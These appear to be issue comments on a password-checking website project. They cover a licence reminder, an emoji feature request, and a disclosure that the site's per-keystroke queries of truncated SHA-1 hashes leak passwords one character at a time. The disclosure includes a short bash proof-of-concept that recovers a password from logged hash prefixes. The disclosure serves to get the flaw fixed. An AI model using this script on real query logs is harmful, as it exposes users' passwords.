Seeing this consistently with the range: 8A5FA. Maybe others...

Should support checking of emoji's in passwords if people wanted to use them 🙂😎🙈

You need to add the licence from https://github.com/howsecureismypassword/hsimp
as stated in the MIT licence:

"The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software."

since incremental search on https://passwordsecurity.info/ starts a new query for each new char, each query is easy to get exploited to determine that one new char. Using knowledge from past/history queries together with the recent query, an attacker could reveal any password typed in for check on that website by merely logging the (unencrypted) queries. Even worse this can get done from logged data as well, no need to first "open a backdoor" or anything (again letting aside HTTPS, which - without PFS https://en.wikipedia.org/wiki/Forward_secrecy which luckily seems established on that website - could get compromised any time in future and reveal all passwords from logs for the past months and years). Still leaves the http server access logs.
Completely defeats the purpose of the SHA hashing and 5char truncation in API

Please disable incremental search immediately

realizing it's not immediately clear to everybody, here an example:
md5 s 03c7c0ace395d80182db07ae2c30f034
md5 sk 41d6ad0761a5d27a9e1bd567041ce9e9
md5 skr 154211326b13dba32f059317703da7ed
md5 skri 624354d6b0d01595488285caba297009
md5 skrit eaef5ef87d9b6c8b497acc64af3fdfcb
03c7 41d6 1542 6243 eaef <- completely describes "skrit"

bash:
spy1(){ shashort(){ sha=$(echo -n "${1}"|sha1sum); echo -n ${sha:0:5}; echo "$1 ${sha:0:5}"&gt;&amp;2; }; for ((i=20; i&lt;126; i++)); do c="$(printf "\x$(printf %x $i)")"; [ "${2}" == "$(shashort ${1}$c)" ] || continue; printf "found:$c\n">&2; printf "$c"; break; done; }
spy(){ pw="${1}"; shift; [ 1 -gt $# ] &amp;&amp; printf "the decoded password is: ${pw}\n\n" && return; sh="${1}"; shift; echo "$# pw:$pw sh:$sh p:$@"; pw+=$(spy1 "${pw}" ${sh}); spy ${pw} "$@"; }
spy "" 86f7e da236 a9993 81fe8 03de6 1f8ac
the decoded password is: abcdef